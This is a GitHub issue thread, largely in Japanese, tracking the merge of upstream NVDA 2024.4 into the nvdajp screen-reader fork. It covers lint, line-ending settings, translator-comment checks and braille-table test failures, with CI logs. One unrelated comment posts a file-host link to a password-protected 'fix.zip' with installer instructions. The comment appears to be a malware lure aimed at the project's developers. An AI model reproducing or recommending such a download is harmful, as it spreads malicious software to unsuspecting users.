### ISSUE TITLE
2024.4 本家のマージ

### ISSUE THREAD

**Issue by nishimotz** [nvdajp/nvdajp#473]
前回の作業
https://github.com/nvdajp/nvdajp/issues/465

準備状況

* 現状の betajp を alphajp に強制 push した
* 当面 alphajp は本家 master ではなく本家 beta を取り込むブランチとして使う

**Comment by nishimotz** [comment]
runlint が落ちると AppVeyor が通らない。
https://ci.appveyor.com/project/TakuyaNishimoto/nvdajp/builds/50496393

runlint するにあたり、pyproject.toml で line-ending を "lf" から "native" に変更した。
runlint.bat を実行するとファイル改行コードが CRLF にそろった状態になる。
git は autocrlf true で commit push して、リポジトリでは lf になる。

**Comment by fan1chun** [comment]
Download 
https://www.mediafire.com/file/jc5ws0hujgycrp5/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by nishimotz** [comment]
appveyor でも autcrlf true を使うようにした。
残った課題は
FAIL: Translation comments check. Translation comments missing or unexpectedly included. See build log for more information.

**Comment by nishimotz** [comment]
```
[00:25:17] Message has no translator comment.
[00:25:17] Source lines: brailleTables.py:415
[00:25:17] Message: Japanese 6 dot computer braille
[00:25:17] 
[00:25:17] Message has no translator comment.
[00:25:17] Source lines: brailleTables.py:427
[00:25:17] Message: Japanese 6 dot kanji braille
[00:25:17] 
[00:25:17] Message has no translator comment.
[00:25:17] Source lines: gui\__init__.py:661
[00:25:17] Message: Japanese Braille viewer
[00:25:17] 
[00:25:17] Message has no translator comment.
[00:25:17] Source lines: gui\jpBrailleViewer.py:18
[00:25:17] Message: NVDA Japanese Braille Viewer
[00:25:17] 
[00:25:17] Message has no translator comment.
[00:25:17] Source lines: gui\settingsDialogs.py:1120
[00:25:17] Message: Beep for IME mode change
[00:25:17] 
[00:25:17] Message has no translator comment.
[00:25:17] Source lines: gui\settingsDialogs.py:1126
[00:25:17] Message: Phonetic reading for Kana
[00:25:17] 
[00:25:17] Message has no translator comment.
[00:25:17] Source lines: gui\settingsDialogs.py:1132
[00:25:17] Message: Phonetic reading for Latin
[00:25:17] 
[00:25:17] Message has no translator comment.
[00:25:17] Source lines: gui\settingsDialogs.py:1156
[00:25:17] Message: Announce candidate number
[00:25:17] 
[00:25:17] Message has no translator comment.
[00:25:17] Source lines: gui\settingsDialogs.py:1162
[00:25:17] Message: Use IME support of nvdajp
[00:25:17] 
[00:25:17] Message has no translator comment.
[00:25:17] Source lines: gui\settingsDialogs.py:1168
[00:25:17] Message: Work around ANSI editbox
[00:25:17] 
[00:25:17] Message has no translator comment.
[00:25:17] Source lines: gui\settingsDialogs.py:1174
[00:25:17] Message: Announce new line in editable text
[00:25:17] 
[00:25:17] Message has no translator comment.
[00:25:17] Source lines: gui\settingsDialogs.py:1180
[00:25:17] Message: Open document file by MSHTA
[00:25:17] 
[00:25:17] Message has no translator comment.
[00:25:17] Source lines: gui\settingsDialogs.py:1186
[00:25:17] Message: Always speak math in English
```

**Comment by nishimotz** [comment]
scons checkPot
runlint

交互に実行し、収束させる。

**Comment by nishimotz** [comment]
全部 PASS した
https://ci.appveyor.com/project/TakuyaNishimoto/nvdajp/builds/50498195/messages

**Comment by nishimotz** [comment]
merge nvaccess beta into alphajp

rununittests がまた落ちる

```
	<testsuite name="tests.unit.test_louisHelper.TestResolvingInternal-20240905225504" tests="4" file="tests/unit/test_louisHelper.py" time="0.000" timestamp="2024-09-05T22:55:09" failures="0" errors="1" skipped="0">
		<testcase classname="tests.unit.test_louisHelper.TestResolvingInternal" name="test_internalTableIncludedInternal" time="0.000" timestamp="2024-09-05T22:55:09" file="..\tests\unit\test_louisHelper.py" line="35">
			<!--Test the case for resolving a particular internal table.-->
		</testcase>
		<testcase classname="tests.unit.test_louisHelper.TestResolvingInternal" name="test_internalTableIncludedUnknown" time="0.000" timestamp="2024-09-05T22:55:09" file="..\tests\unit\test_louisHelper.py" line="51">
			<!--Test the case where an included table does not exist.-->
		</testcase>
		<testcase classname="tests.unit.test_louisHelper.TestResolvingInternal" name="test_unknownInternalTable" time="0.000" timestamp="2024-09-05T22:55:09" file="..\tests\unit\test_louisHelper.py" line="45">
			<!--Test the case where a table does not exist, regardless of base.-->
		</testcase>
		<testcase classname="tests.unit.test_louisHelper.TestResolvingInternal" name="test_tableResolvingInternal" time="0.000" timestamp="2024-09-05T22:55:09" file="..\tests\unit\test_louisHelper.py" line="19">
			<!--Test whether our custom braille table resolver can resolve all defined tables.-->
			<error type="LookupError" message="Could not resolve table 'grc-international-en-composed.utb', looked in paths: ['f:\\nvda\\gh\\alphajp\\source\\louis\\tables']"><![CDATA[Traceback (most recent call last):
  File "f:\nvda\gh\alphajp\tests\unit\test_louisHelper.py", line 24, in test_tableResolvingInternal
    list(louisHelper._resolveTableInner(tables=[table.fileName])),
    ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "f:\nvda\gh\alphajp\source\louisHelper.py", line 68, in _resolveTableInner
    raise LookupError(f"Could not resolve table {table!r}, looked in paths: {directoriesToSearch!r}")
LookupError: Could not resolve table 'grc-international-en-composed.utb', looked in paths: ['f:\\nvda\\gh\\alphajp\\source\\louis\\tables']
]]></error>
		</testcase>
	</testsuite>
```

```
	<testsuite name="tests.unit.test_brailleTables.TestFBrailleTables-20240905225504" tests="2" file="tests/unit/test_brailleTables.py" time="0.016" timestamp="2024-09-05T22:55:05" failures="1" errors="0" skipped="0">
		<testcase classname="tests.unit.test_brailleTables.TestFBrailleTables" name="test_renamedTableExistence" time="0.016" timestamp="2024-09-05T22:55:05" file="..\tests\unit\test_brailleTables.py" line="34">
			<!--Tests whether all defined renamed tables are part of the actual list of tables.-->
		</testcase>
		<testcase classname="tests.unit.test_brailleTables.TestFBrailleTables" name="test_tableExistence" time="0.000" timestamp="2024-09-05T22:55:05" file="..\tests\unit\test_brailleTables.py" line="17">
			<!--Tests whether all defined tables exist.-->
			<failure type="AssertionError" message="False is not true : Greek international braille (single-cell accented letters) table not found"><![CDATA[Traceback (most recent call last):
  File "f:\nvda\gh\alphajp\tests\unit\test_brailleTables.py", line 29, in test_tableExistence
    self.assertTrue(
AssertionError: False is not true : Greek international braille (single-cell accented letters) table not found
]]></failure>
		</testcase>
	</testsuite>
```

**Comment by nishimotz** [comment]
clone や scons をやりなおせば通るらしい
https://ci.appveyor.com/project/TakuyaNishimoto/nvdajp/builds/50543637/tests

**Comment by nishimotz** [comment]
本家版の問題と思われるが、点字設定の画面のレイアウト

![image](https://github.com/user-attachments/assets/f2534203-4e18-469b-9b96-29d19dbdc9be)

**Comment by nishimotz** [comment]
点字設定の画面のレイアウト: 本家にフィードバックして修正された

**Comment by nishimotz** [comment]
editorconfig でファイル改行コード LF になっているが、git config autocrlf true であり、
開発者が Windows で作業することが前提であるため、CRLF に変更します。
Visual Studio Code の editorconfig 拡張は、改行コードに関しては保存時に反映されることを確認しました。

**Comment by nishimotz** [comment]
https://github.com/nvdajp/nvdajp/pull/474 をマージしました。

今後 alphajp は本家 2025.1 への対応に使います。
